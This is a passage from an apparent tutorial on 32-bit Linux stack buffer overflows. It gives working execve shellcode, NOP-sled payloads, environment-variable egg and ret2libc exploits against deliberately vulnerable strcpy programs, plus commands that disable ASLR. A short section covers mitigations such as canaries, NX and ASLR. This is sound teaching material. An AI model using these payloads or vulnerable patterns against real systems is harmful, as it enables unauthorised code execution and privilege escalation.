8049380: 6a 17 push $0x17 8049382: 58 pop %eax 8049383: 31 db xor %ebx,%ebx 8049385: cd 80 int $0x80 execve("/bin//sh", ["/bin//sh"], NULL) 8049387: 6a 0b push $0xb 8049389: 58 pop %eax 804938a: 99 cltd 804938b: 52 push %edx 804938c: 68 2f 2f 73 68 push $0x68732f2f 8049391: 68 2f 62 69 6e push $0x6e69622f 8049396: 89 e3 mov %esp,%ebx 8049398: 52 push %edx 8049399: 53 push %ebx 804939a: 89 e1 mov %esp,%ecx 804939c: cd 80 int $0x80 shellcode="\x6a\x17\x58\x31\xdb\xcd\x80\x6a\x0b\x58\x99\x52\x68//sh\x68/bin\x89\xe3\x52\x53\x89\xe1\xcd\x80" $ (python sample1.py;cat) | ./sample1 whoami root
These were probably worth mentioning as we frequently get questions on those specific issues. We most likely didn’t even scratch the issues you’ll be experiencing, but explore, improvize, don’t get stuck on one place too long self examining if you’re crazy. Reorganize the elements, shift, double check, change the ShellCode, change the user, the system, etc. An insane idea/thought might not seem so irrational when everything starts working, try everything.
Buffer overflow attack: Example II
The strcpy() is maybe a bit easier to conquer but here we’ll do things a bit differently maybe:
#include <string.h> #include <stdio.h> void func(char *name) { char buf[100]; strcpy(buf, name); printf("Text: %s\n", buf); } int main(int argc, char *argv[]) { func(argv[1]); return 0; }
Disassembling the function:
(gdb) disas func
Dump of assembler code for function func:
0x000011a9 <+0>: push %ebp
0x000011aa <+1>: mov %esp,%ebp
0x000011ac <+3>: sub $0x64,%esp
0x000011af <+6>: pushl 0x8(%ebp)
0x000011b2 <+9>: lea -0x64(%ebp),%eax
0x000011b5 <+12>: push %eax
0x000011b6 <+13>: call 0x11b7
0x000011bb <+18>: add $0x8,%esp
0x000011be <+21>: lea -0x64(%ebp),%eax
0x000011c1 <+24>: push %eax
0x000011c2 <+25>: push $0x2008
0x000011c7 <+30>: call 0x11c8
0x000011cc <+35>: add $0x8,%esp
0x000011cf <+38>: nop
0x000011d0 <+39>: leave
0x000011d1 <+40>: ret
End of assembler dump.
The 0x64 is allocating 100 bytes for the buffer. The stack structure:
HIGH |----------------| ------------ func start | name | 8 (%EBP) |----------------| | RET | 4 (%EBP) |----------------| | EBP | --> points to previous / main's frame (%EBP) |----------------| | buffer | -4 (%EBP) => 100 bytes | | |----------------| ------------ func end (ESP) LOW
Ok, so in order to overwrite the RET we need buffer (100 bytes) + EBP (4 bytes) + RET (4 bytes):
(gdb) run $(python -c 'print "\x41" * 100 + "\x42\x42\x42\x42" + "\x43\x43\x43\x43"')
Starting program: /root/TEST_AREA/bufferoverflow/program/sample2 $(python -c 'print "\x41" * 100 + "\x42\x42\x42\x42" + "\x43\x43\x43\x43"')
Text: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBCCCC
Program received signal SIGSEGV, Segmentation fault.
0x43434343 in ?? ()
The segmentation fault and 0x43434343 indicates that we successfully overwriten RET. Since there’s nothing on 0x43434343, processes ends up with SIGSEGV. Check the stack and registers:
(gdb) x/50x $sp-150 0xbffff1ee: 0x3d80b7e2 0x2008b7fb 0xf2140040 0x0000bfff 0xbffff1fe: 0x00000000 0x00000000 0xc9850000 0x11ccb7e2 0xbffff20e: 0x20080040 0xf2180040 0x4141bfff 0x41414141 0xbffff21e: 0x41414141 0x41414141 0x41414141 0x41414141 0xbffff22e: 0x41414141 0x41414141 0x41414141 0x41414141 0xbffff23e: 0x41414141 0x41414141 0x41414141 0x41414141 0xbffff24e: 0x41414141 0x41414141 0x41414141 0x41414141 0xbffff25e: 0x41414141 0x41414141 0x41414141 0x41414141 0xbffff26e: 0x41414141 0x41414141 0x41414141 0x42424141 0xbffff27e: 0x43434242 0xf4004343 0x0000bfff 0xa7e10000 0xbffff28e: 0x0002b7df 0xf3240000 0xf330bfff 0xf2b4bfff 0xbffff29e: 0x0001bfff 0x00000000 0x30000000 0x0000b7fb 0xbffff2ae: 0xf0000000 0x0000b7ff (gdb) i r eax 0x73 115 ecx 0x7fffff8d 2147483533 edx 0xb7fb5010 -1208266736 ebx 0x0 0 esp 0xbffff284 0xbffff284 ebp 0x42424242 0x42424242 esi 0xb7fb3000 -1208274944 edi 0xb7fb3000 -1208274944 eip 0x43434343 0x43434343 eflags 0x10286 [ PF SF IF RF ] cs 0x73 115 ss 0x7b 123 ds 0x7b 123 es 0x7b 123 fs 0x0 0 gs 0x33 51
As expected EBP = 0x42424242 , EIP = 0x43434343.
ShellCode
We already shown a few examples on how to generate or create a shellcode, but we’ll go through another way of compiling it. There’s widely available list of shellcodes and sources you can use.
xor eax, eax ; Clearing eax register push eax ; Pushing NULL bytes push 0x68732f2f ; Pushing //sh push 0x6e69622f ; Pushing /bin mov ebx, esp ; ebx now has address of /bin//sh push eax ; Pushing NULL byte mov edx, esp ; edx now has address of NULL byte push ebx ; Pushing address of /bin//sh mov ecx, esp ; ecx now has address of address ; of /bin//sh byte mov al, 11 ; syscall number of execve is 11 int 0x80 ; Make the system call
Push the code into shellcode.asm and assemble it:
$ nasm -f elf shellcode.asm
Dump the resulting object file (ELF) and extract the shellcode:
$ objdump -d -M intel shellcode.o shellcode.o: file format elf32-i386 Disassembly of section .text: 00000000 <.text>: 0: 31 c0 xor eax,eax 2: 50 push eax 3: 68 2f 2f 73 68 push 0x68732f2f 8: 68 2f 62 69 6e push 0x6e69622f d: 89 e3 mov ebx,esp f: 50 push eax 10: 89 e2 mov edx,esp 12: 53 push ebx 13: 89 e1 mov ecx,esp 15: b0 0b mov al,0xb 17: cd 80 int 0x80 $ for i in $(objdump -D shellcode.o -M intel |grep "^ " |cut -f2); do echo -n '\x'$i; done;echo \x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80
We’ve ended up with our shellcode (25 bytes):
\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80
NOP Sled & Execution
NOP or no-operation is basically an empty step. When CPU hits such instruction, it simply goes over it to the next one.
Stack randomization might make things difficult when it comes to buffer overflow, it’s hard to predict where will the jump land, so the idea here is to place large block of NOP’s above the shellcode. The NOP area is more difficult to miss (even if address randomizes/moves a little). If RET lands in the NOP area CPU is going to execute empty operations until it hits our shellcode (basically sliding to it)
...\x90 \x90 \x90 \x90 \x90 | \x31 \xc0 \x50 \x68\ \x2f ... NOP Sled SHELLCODE
Our space of operation is 108 bytes (BUFFER + EBP + RET). The payload will look just like that : NOP ( 79 ) + SHELLCODE (25 BYTES) + RET (NOP ADDR)
(gdb) run $(python -c 'print "\x90" * 79 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80" + "\x43\x43\x43\x43"') The program being debugged has been started already. Start it from the beginning? (y or n) y Starting program: /root/TEST_AREA/bufferoverflow/program/sample2 $(python -c 'print "\x90" * 79 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80" + "\x43\x43\x43\x43"') Text: �������������������������������������������������������������������������������1�Ph//shh/bin��P��S�� CCCC Program received signal SIGSEGV, Segmentation fault. 0x43434343 in ?? () (gdb) x/50x $sp-150 0xbffff1ee: 0x3d80b7e2 0x2008b7fb 0xf2140040 0x0000bfff 0xbffff1fe: 0x00000000 0x00000000 0xc9850000 0x11ccb7e2 0xbffff20e: 0x20080040 0xf2180040 0x9090bfff 0x90909090 0xbffff21e: 0x90909090 0x90909090 0x90909090 0x90909090 0xbffff22e: 0x90909090 0x90909090 0x90909090 0x90909090 0xbffff23e: 0x90909090 0x90909090 0x90909090 0x90909090 0xbffff24e: 0x90909090 0x90909090 0x90909090 0x90909090 0xbffff25e: 0x90909090 0x90909090 0x50c03190 0x732f2f68 0xbffff26e: 0x622f6868 0xe3896e69 0x53e28950 0x0bb0e189 0xbffff27e: 0x434380cd 0xf4004343
Targeting some address in the NOP block, e.g. 0xbffff21e, mind the endian thing and we’re having \x1e\xf2\xff\xbf.
(gdb) run $(python -c 'print "\x90" * 63 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80" + "\x1e\xf2\xff\xbf" * 5') Starting program: /root/TEST_AREA/bufferoverflow/program/sample2 $(python -c 'print "\x90" * 63 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80" + "\x1e\xf2\xff\xbf" * 5') Text: ���������������������������������������������������������������1�Ph//shh/bin��P��S�� ��������������� process 16737 is executing new program: /usr/bin/dash # whoami [Detaching after fork from child process 16742] cyberpunk # exit [Inferior 1 (process 16737) exited normally] (gdb) quit
$ ./sample2 $(python -c 'print ...') or $ ./sample2 `print -c ' print "\x90" * 63 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80" + "\x1e\xf2\xff\xbf" * 5'` Text: �����������������������������������������������������j1X1�̀�É�jFX̀� Rhn/shh//bi���̀N���N���N���N��� # whoami root # exit
There are numerous ShellScripts out there, various sizes/actions, but with the same purpose:
21 bytes: ---------------------------------------- \x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80 xor ecx, ecx mul ecx push ecx push 0x68732f2f ;; hs// push 0x6e69622f ;; nib/ mov ebx, esp mov al, 11 int 0x80 (gdb) run $(python -c 'print "\x90" * 67 + "\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80" + "\x1e\xf2\xff\xbf" * 5') 23 bytes: ---------------------------------------- \x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80 xor %eax,%eax push %eax push $0x68732f2f push $0x6e69622f mov %esp,%ebx push %eax push %ebx mov %esp,%ecx mov $0xb,%al int $0x80 (gdb) run $(python -c 'print "\x90" * 65 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80" + "\x1e\xf2\xff\xbf" * 5') 28 bytes: ---------------------------------------- \x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80 (gdb) run $(python -c 'print "\x90" * 60 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80" + "\x1e\xf2\xff\xbf" * 5')
Examples : HackYou & ExploitMe
The following two examples are frequently mention online and we also think they’re good examples to check out.
HackYou.c:
#include <stdio.h> #include <stdlib.h> #include <string.h> // shellcode ripped from http://www.milw0rm.com/shellcode/444 char shellcode[]= "\x31\xc0" // xorl %eax,%eax "\x50" // pushl %eax "\x68\x6e\x2f\x73\x68" // pushl $0x68732f6e "\x68\x2f\x2f\x62\x69" // pushl $0x69622f2f "\x89\xe3" // movl %esp,%ebx "\x99" // cltd "\x52" // pushl %edx "\x53" // pushl %ebx "\x89\xe1" // movl %esp,%ecx "\xb0\x0b" // movb $0xb,%al "\xcd\x80" // int $0x80 ; char retaddr[] = "\xaa\xaa\xaa\xaa"; #define NOP 0x90 int main() { char buffer[96]; memset(buffer, NOP, 96); memcpy(buffer, "EGG=", 4); memcpy(buffer+4, shellcode, 24); memcpy(buffer+88, retaddr, 24); memcpy(buffer+92, "\x00\x00\x00\x00", 4); putenv(buffer); system("/bin/sh"); return 0; }
So, what all this does. HackYou buffer is initially being filled with NOPs (0x90). In the following steps “EGG=” var is being placed at the begining of the buffer, then sequentially we have ShellCode, RET and NULL.
ExploitMe.c
#include<stdio.h> #include<string.h> int main(int argc, char **argv) { char buffer[80]; strcpy(buffer, argv[1]); return 1; }
Structure:
HackYou: HIGH |----------------| ------------ f1 start | EGG | 4 |----------------| | ShellCode | 24 <-------------------------- |----------------| | | | 60 | | | | | | | | | | |----------------| | | PTR | 4 -------------------------- |----------------| | NULL | 4 |----------------| ------------ f1 end LOW ExploitMe: HIGH |----------------| ------------ f1 start | buffer | 80 bytes => buffer | | | | | | |----------------| | EBP | 4 |----------------| | NUL | 4 |----------------| ------------ f1 end LOW
The idea here is for “ExploitMe” to call “HackYou” ShellCode situated in EGG env var. Let’s check it out.
$ gcc -ggdb -fno-pic -z execstack -mpreferred-stack-boundary=2 -o HackYou HackYou.c $ gcc -ggdb -fno-pic -z execstack -mpreferred-stack-boundary=2 -o ExploitMe ExploitMe.c
$ ./HackYou # echo $EGG 1�Phn/shh//bi��RS�� �������������������������������������������������������������� # gdb ExplotMe (gdb) break main Breakpoint 1 at 0x4011aa: file ExploitMe.c, line 7. (gdb) break 8 Breakpoint 2 at 0x4011b4: file ExploitMe.c, line 8. (gdb) run $EGG The program being debugged has been started already. Start it from the beginning? (y or n) y Starting program: /root/TEST_AREA/bufferoverflow/program/ExploitMe $EGG Breakpoint 1, main (argc=2, argv=0xbffff274) at ExploitMe.c:7 7 strcpy(buffer, argv[1]); (gdb) disas main Dump of assembler code for function main: 0x00401199 <+0>: push %ebp 0x0040119a <+1>: mov %esp,%ebp 0x0040119c <+3>: sub $0x50,%esp => 0x0040119f <+6>: mov 0xc(%ebp),%eax 0x004011a2 <+9>: add $0x4,%eax 0x004011a5 <+12>: mov (%eax),%eax 0x004011a7 <+14>: push %eax 0x004011a8 <+15>: lea -0x50(%ebp),%eax 0x004011ab <+18>: push %eax 0x004011ac <+19>: call 0xb7e6e700 <__strcpy_sse2> 0x004011b1 <+24>: add $0x8,%esp 0x004011b4 <+27>: mov $0x1,%eax 0x004011b9 <+32>: leave 0x004011ba <+33>: ret End of assembler dump.
With ExploitMe having 88 bytes (Buffer + EBP + RET), let’s see the content:
(gdb) x/22xw $esp 0xbffff188: 0xb7ffe840 0xb7fb6d08 0xb7fe62d0 0xb7fb3000 0xbffff198: 0x00000000 0xb7e119eb 0xb7fb33fc 0x00000001 0xbffff1a8: 0x00404000 0x0040120b 0x00000002 0xbffff274 0xbffff1b8: 0xbffff280 0x004011dd 0xb7fe62d0 0x00000000 0xbffff1c8: 0x00000000 0x00000000 0xb7fb3000 0xb7fb3000 0xbffff1d8: 0x00000000 0xb7dfa7e1
The 0xb7dfa7e1
is RET. To confirm it, disassemble it:
(gdb) disas 0xb7dfa7e1 Dump of assembler code for function __libc_start_main: 0xb7dfa6f0 <+0>: call 0xb7f14a69 <__x86.get_pc_thunk.ax> 0xb7dfa6f5 <+5>: add $0x1b890b,%eax 0xb7dfa6fa <+10>: push %ebp 0xb7dfa6fb <+11>: xor %edx,%edx
Now check the ShellCode in memory (HackYou, EGG):
(gdb) x/22xw argv[1] 0xbffff437: 0x6850c031 0x68732f6e 0x622f2f68 0x99e38969 0xbffff447: 0xe1895352 0x80cd0bb0 0x90909090 0x90909090 0xbffff457: 0x90909090 0x90909090 0x90909090 0x90909090 0xbffff467: 0x90909090 0x90909090 0x90909090 0x90909090 0xbffff477: 0x90909090 0x90909090 0x90909090 0x90909090 0xbffff487: 0x90909090 0xaaaaaaaa
The strcpy is overwriting buffer/top of the stack with argv[1] or our ShellCode:
(gdb) c Continuing. Breakpoint 2, main (argc=0, argv=0xbffff274) at ExploitMe.c:8 8 return 1; (gdb) x/22xw $esp 0xbffff188: 0x6850c031 0x68732f6e 0x622f2f68 0x99e38969 0xbffff198: 0xe1895352 0x80cd0bb0 0x90909090 0x90909090 0xbffff1a8: 0x90909090 0x90909090 0x90909090 0x90909090 0xbffff1b8: 0x90909090 0x90909090 0x90909090 0x90909090 0xbffff1c8: 0x90909090 0x90909090 0x90909090 0x90909090 0xbffff1d8: 0x90909090 0xaaaaaaaa
If we continue, we’re going to encounter SIGSEGV/Segmentation Fault as 0xaaaaaaaa is the wrong address. We need to point that to the begining of our ShellCode, in this case 0xbffff188. Change the retaddrr[] in HackYou.c to “\x88\xf1\xff\xbf” and recompile. If we now check the situation:
(gdb) x/22xw $esp 0xbffff188: 0x6850c031 0x68732f6e 0x622f2f68 0x99e38969 0xbffff198: 0xe1895352 0x80cd0bb0 0x90909090 0x90909090 0xbffff1a8: 0x90909090 0x90909090 0x90909090 0x90909090 0xbffff1b8: 0x90909090 0x90909090 0x90909090 0x90909090 0xbffff1c8: 0x90909090 0x90909090 0x90909090 0x90909090 0xbffff1d8: 0x90909090 0xbffff188 (gdb) c Continuing. process 9316 is executing new program: /usr/bin/dash Error in re-setting breakpoint 1: No source file named /root/TEST_AREA/bufferoverflow/program/ExploitMe.c.
The RET is pointing to the begining of the ShellCode and we’re successfully ending in the shell.
[Anti] Prevention
Main thing is for developers to write a secure code. The OS already have some protection set in place:
NX (Non-Executable Memory) / Data Execution Prevention (DEP)
: CPU raising SIGSEGV in case EIP points to NXASLR (Address Space Layout Randomization)
: placing stack and other segments at random addresses. This might not be ideal on 32bit machines as only 16 bits are available for randomization (Brute Force possible) [/proc/sys/kernel/randomize_va_space]Stack Smashing Protection using Stack cookies / Stack Canaries (SSP)
: Stack cookie is a value (4 / 8 bytes), randomly chosen nad placed before EBP. On return, function checks this cookie and if it’s modified, program just crash (gcc’s -fstack-protector-all, making canaries for all functions, safe but somewhat slow)Code Pointer Integrity (CPI)
: guarantees integrity of all code pointers in a program, preventing control-flow hijack. The idea is to split safe-region (hardware-protection, storing the pointers) and regular-region. Safe region can onlybe accessed via “safe” ops (compile/runtime checked). (Strong-Precise)Code Flow Integrity (CFI)
: (Medium, some overhead, “old” )Code Pointer Separation (CPS)
: a CPI variant more appropriate for code with large number of virtual function pointers. Here, all pointers are placed in a safe-region, but pointers used to access them are left in regular region. (Strong)
Memory safety is strong-precise but offers huge overhead (program/process slows down 100+%). Additionally, we’re going to share “Smashing the stack protector for fun and profit” CookieCrumbler details:
Legend:
- LOC: a variable residing on the stack the function
- TLS: a variable residing in Thread Local Storage (TLS)
- GLO: a global variable residing in statically allocated memory
- DYN: a variable residing in dynamically memory
- main: main thread
- sub: sub thread
- ✘ (red) – Vulnerable implementation: a long buffer overflow on the stack allows for a complete stack canary bypass
- ✘ (orange) – Weak implementation: the reference value is located next to this memory class, which potentially allows an attacker to bypass the protection
- ✔ – Secure implementation: the reference value can’t be overwritten from this memory class
Thread Control Block (TCB)
OSs have a data structure (TCB) in which threads execute in. Windows variant if ThreadInformationBlock and contains info on thread’s Structured Exception Handling (SEH) chain, associated Process Control Block (PCB) and pointer to Thread Local Storage (TLS). The access to TCB varies, via library function or register. GLibc (Linux x82_64) uses fs register as base addr of TCB, Intel uses Model Specific Registers (MCRs) overraiding fs and gs segments.
CPI and SSP both require storage of their random key references and TCB is being for that purpose.
Non-Executable Stack (NX)
To circumvent this we can rely on Return Oriented Programming (ROP) or more perticularly on Return to Libc technique, overwriting the buffer/stack and instead of placing a ShellCode in it, we just adjust or point the RET to system() call within Libc invoking the Shell creation. No execution of code within the stack. We’re also overwriting the next instruction with Exit() and place the “/bin/bash” argument behind it. If we take the ExploitMe.c as a reference:
HIGH |----------------| ------------ f1 start | PTR3 | 4 bytes => /bin/bash |----------------| | PTR2 | 4 bytes => Exit() |----------------| | PTR1 | 4 bytes => System() // OVERWRITEN RET |----------------| | EBP | 4 bytes |----------------| | buffer | 80 bytes => buffer | | | | | | |----------------| ------------ f1 end LOW
So, we’re basically creating the “stack” frame for system() call where we have “parameter(s)” at the top, then RET -> Exit(), followed by the [in theory, non-existent in this case] EBP, local vars, etc.
We have ret2lib.c shellcode (Security Tube example):
#include <stdio.h> #include <stdlib.h> #include <string.h> char systemAddr[] = "\x60\xe5\xea\xb7"; char exitAddr[] = "\x50\x3b\xea\xb7"; char bashAddr[] = "\x50\xfd\xff\xbf" int main() { char buffer[104]; memset(buffer, 0x90, 104); memcpy(buffer, "BUF=", 4); memcpy(buffer+88, systemAddr, 4); // OVERWRITING RET WITH SYSTEM() memcpy(buffer+92, exitAddr, 4); // Exit() memcpy(buffer+96, bashAddr, 4); // shell string memcpy(buffer+100, "\x00\x00\x00\x00", 4); putenv(buffer); system("/bin/bash"); return 1; }
The ExploitMe is the target:
#include <stdio.h> #include <string.h> int main(int argc, char **argv) { char buffer[80]; getchar(); //TMP, find the addresses strcpy(buffer, argv[1]); return 1; }
$ gcc -ggdb -fno-pic -mpreferred-stack-boundary=2 -o ExploitMe ExploitMe.c $ gdb ExploitMe (gdb) break main Breakpoint 1 at 0x119f: file ExploitMe.c, line 8. (gdb) run test Starting program: /unknown/TEST_AREA/bufferoverflow/ExploitMe test Breakpoint 1, main (argc=2, argv=0xbffff374) at ExploitMe.c:8 8 strcpy(buffer, argv[1]); (gdb) p system $1 = {int (const char *)} 0xb7e1e6e0 <__libc_system> (gdb) p exit $2 = {void (int)} 0xb7e117a0 <__GI_exit>
The “-fno-pic” is vital it seems (in this example), without it nothing happens in the end or you up with “Segmentation fault”. Before we proceed let’s introduce another piece of code which is going to find our ENV var addresses, GEVA (Get ENV Variable Address):
#include <stdio.h> #include <stdlib.h> int main(int argc, char **argv) { char *addr = getenv(argv[1]); printf("Addr of %s: %p (%s)\n", argv[1], addr, addr); return 0; } $ gcc -ggdb -mpreferred-stack-boundary=2 -o GEVA GEVA.c
Running the ret2libc shellcode, finding the “shell” location:
$ gcc -ggdb -mpreferred-stack-boundary=2 -o ret2libc ret2libc.c $ ./ret2libc $ ./GEVA BUF Addr of BUF: 0xbffffde4 (��������������������������������������������������������������������������������������ᷠ�����) $ export myshell="/bin/sh" $ ./GEVA myshell Addr of myshell: 0xbffffed6 (/bin/sh) $ ./ExploitMe $BUF >
The getchar() will “pause” the execution, so jump to another terminal, and connect to ExploitMe process via GDB:
$ ps -eaf | grep ExploitMe root 13268 13265 0 09:32 pts/0 00:00:00 ./ExploitMe ?????????????????????????????????????????????????????????????????????????????????????????????? root 13270 9730 0 09:32 pts/1 00:00:00 grep ExploitMe $ gdb ExploitMe 13268
Inside, find/verify the “myshell” location with x/1s (hit the enter a number of times):
(gdb) x/1s 0xbffffed6 0xbffffed6: "G_RUNTIME_DIR=/run/user/0" (gdb) 0xbffffef0: "XDG_DATA_DIRS=/usr/share/gnome:/usr/local/share/:/usr/share/" ... (gdb) 0xc0000000: <error: Cannot access memory at the address 0xc0000000>
As you can see, it’s nowhere to be found. Let’s check location before the one we got (0xbffffec0 < 0xbffffed6 ):
(gdb) x/1s 0xbffffec0 0xbffffec0: "D=2" (gdb) 0xbffffec4: "myshell=/bin/sh" (gdb) x/1s 0xbffffecc 0xbffffecc: "/bin/sh"
Ok, now we have everything, go back and adjust the shellcode (mind the Endian thing):
char systemAddr[] = "\xe0\xe6\xe1\xb7"; // 0xb7e1e6e0 char exitAddr[] = "\xa0\x17\xe1\xb7"; // 0xb7e117a0 char bashAddr[] = "\xcc\xfe\xff\xbf" // 0xbffffecc
You can remove getchar() from ExploitMe if you wish (or not). If you now re-compile everything and run it:
$ ./ret2lib $ export myshell="/bin/sh" $ ./ExploitMe $BUF #
… and we got the shell (/bin/sh).
ASLR
As mentioned ASLR is defined by /proc/sys/kernel/randomize_va_space flag. Check the process memory maps.
$ cat /proc/self/maps ... bfcf0000-bfd11000 rw-p 00000000 00:00 0 [stack] $ cat /proc/self/maps ... bfb07000-bfb28000 rw-p 00000000 00:00 0 [stack]
If ASLR is enabled (2), you’ll see randomization, if not, the stack location will be the same/unchanged. To disable it:
$ echo 0 > /proc/sys/kernel/randomize_va_space
In general, there a few ways to bypass ASLR:
- Direct RET overwrite : process with ASLR might load non-ASLR modules, running your ShellCode via jmp esp
- Partial EIP overwrite : calculate your target, non-ASLR module
- NOP spray : create a big “block of NOPs to increase a chance of jump landing on the right place, NOP Sled (not working if NX/DEP enabled)
- Bruteforce : trying different addresses until it works (program not crashing)
Conclusion
General approach is to find the limits, overwrite RET and reach the shellcode. Some functions might be more difficult than others, so pay attention to details and notes we mentioned.
This is relatively long and complex article. Hopefully it clarified certain things when it comes to buffer overflow attack (details, terms, approaches, styles, etc) and it has shown a lot of things we should continue working on. It’s not always easy to exploit a program and security measures constantly advance. With all that in mind, we have a long way ahead of us, a lot of ground to cover. We’ll continue adding things and updating this article (techniques, explanations, examples, etc). Keep up, don’t give up.